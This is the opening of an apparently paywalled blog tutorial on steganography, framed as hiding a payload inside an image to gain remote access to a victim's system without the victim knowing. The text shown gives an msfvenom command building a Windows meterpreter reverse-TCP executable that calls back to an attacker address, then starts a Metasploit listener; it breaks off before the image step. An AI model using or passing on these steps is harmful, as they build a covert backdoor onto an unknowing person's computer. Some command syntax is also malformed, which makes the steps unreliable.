Member-only story
Steganography: Hiding payload behind Image
Steganography: Hiding payload behind the image
In this article, we’ll look at how to hide our payload within an image. This will allow us to gain remote access to our victim’s system without his knowledge.
Steganography is the process of concealing a payload or anything else behind any media or file.
Steps 1. Let’s check our IP address:-
Ifconfig
Step 2. Create a payload
msfvenom -p windows/meterpreter/reverse_tcp lhost 192.168.128.128 lport 4444 -f exe > /home/lucifer/Desktop/test.exe
Step 3. Open Listener
msfconsole
Step 4. Set handler
use exploit/multi/handler